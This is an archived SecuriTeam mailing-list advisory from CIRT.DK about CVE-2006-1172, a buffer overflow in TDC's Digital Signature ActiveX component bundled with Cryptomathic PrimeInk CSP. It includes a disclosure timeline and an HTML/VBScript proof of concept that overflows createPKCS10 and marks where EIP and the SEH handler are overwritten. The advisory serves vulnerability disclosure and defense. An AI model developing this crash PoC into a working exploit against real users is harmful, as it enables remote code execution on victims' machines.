The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Cryptomathic ActiveX Buffer Overflow
------------------------------------------------------------------------
SUMMARY
"A <http://www.cryptomathic.com/products/primeink_csp.html> Cryptographic
Service Provider (CSP) is a Microsoft Windows component that offers
cryptographic services such as encryption or signing and the secure
storage of user keys."
Improper handling of user input allows attackers to execute arbitrary code
using the TDC Digital signature ActiveX.
DETAILS
A vulnerability has been found in an ActiveX object distributed as part of
TDC's Microsoft CSP suite.
The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects.
The primary task of the CSP is to handle private RSA keys that are
encrypted by keys derived from the user provided passwords. The ActiveX
objects assist in key management operations like certificate request
generation, installation of issued certificate, key and certificate
backup/recovery and change of password.
While Cryptomathic PrimeInk CSP is used by many institutions around the
world, the ActiveX objects have only been distributed as part of TDC's
Microsoft CSP suite in Denmark.
The problem is an unhanded field in cenroll.dll, allowing full control of
the Instruction Pointer(EIP) on the stack and the SEH allowing several
ways to do code execution.
The vulnerability allows code execution on any client machine that has the
component installed if the user navigates to an attacker-created website.
The attacker creates a website that calls the installed ActiveX component,
or it would be possible to make an email with an embedded HTML page
thereby triggering an overflow.
Proof of Concept:
The Proof-of-Concept applied here only shows that the vulnerability are
present. A PoC have been developed proving that code execution is truly
possible.
The PoC developed, exploits the implementation used by TDC Digital
signature.
< html>
< head>
< title>CIRT.DK - Cryptomathic ActiveX Buffer Overflow< / title>
< IMG SRC="http://www.cirt.dk/images/logo.jpg";>
< / head>
< body>
< center>
< h1>TDC Digital Signature ActiveX Buffer Overflow< / h1>
< h4> (c)2006 by Dennis Rand - CIRT.DK< / h4>
The following Proof-of-Concept will make Internet Explorer
shutdown, if you are vulnerable.<br>
< / center>
< br >
< script>alert('Press "OK" to see if you are vulnerable')< / script>
< object classid='clsid:6DA9275C-64E5-42A1-879C-D90B5F0DC5B4'
id='target' >< / object>
< script language='vbscript'>
arg1 = String(8, "A")
arg1 = arg1 + "ABCD" ' EIP is overwritten here
arg1 = arg1 + String(64, "B")
arg1 = arg1 + "AABB" ' Pointer to the next SEH Handler
arg1 = arg1 + "BBAA" ' SE Handler
arg1 = arg1 + String(700, "C")
arg2 = "DefaultV"
target.createPKCS10 arg1 ,arg2
< / script>
< script>alert('You are secure')< / script>
< / body>
< / html>
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1172>
CVE-2006-1172
Disclosure Timeline:
18-03-2006 Vulnerability discovered
28-03-2006 Vulnerability reported to Morten Storm TDC Certificates An
email sent through csirt at csirt.dk
29-03-2006 TDC responds having received the report
30-03-2006 Received CERT/CC vulnerability tag / CVE tag
30-03-2006 Vulnerability reported to Cryptomathic Morten.Landrock at
cryptomathic.com and Torben.Pedersen at cryptomathic.com
30-03-2006 Cryptomathic A/S verifies that they received the report.
25-04-2006 Cryptomathic A/S provides final fix to TDC
01-05-2006 Cryptomathic A/S and TDC approves the final advisory
05-05-2006 TDC releases news to the press, and start rolling out a patch.
05-05-2006 Public release
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisory@cirt.dk> CIRT.DK.
The original article can be found at:
<http://www.cirt.dk/advisories/cirt-43-advisory.pdf>
http://www.cirt.dk/advisories/cirt-43-advisory.pdf
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
![http://www.cirt.dk/images/logo.jpg"](http://www.cirt.dk/images/logo.jpg"){kind=link}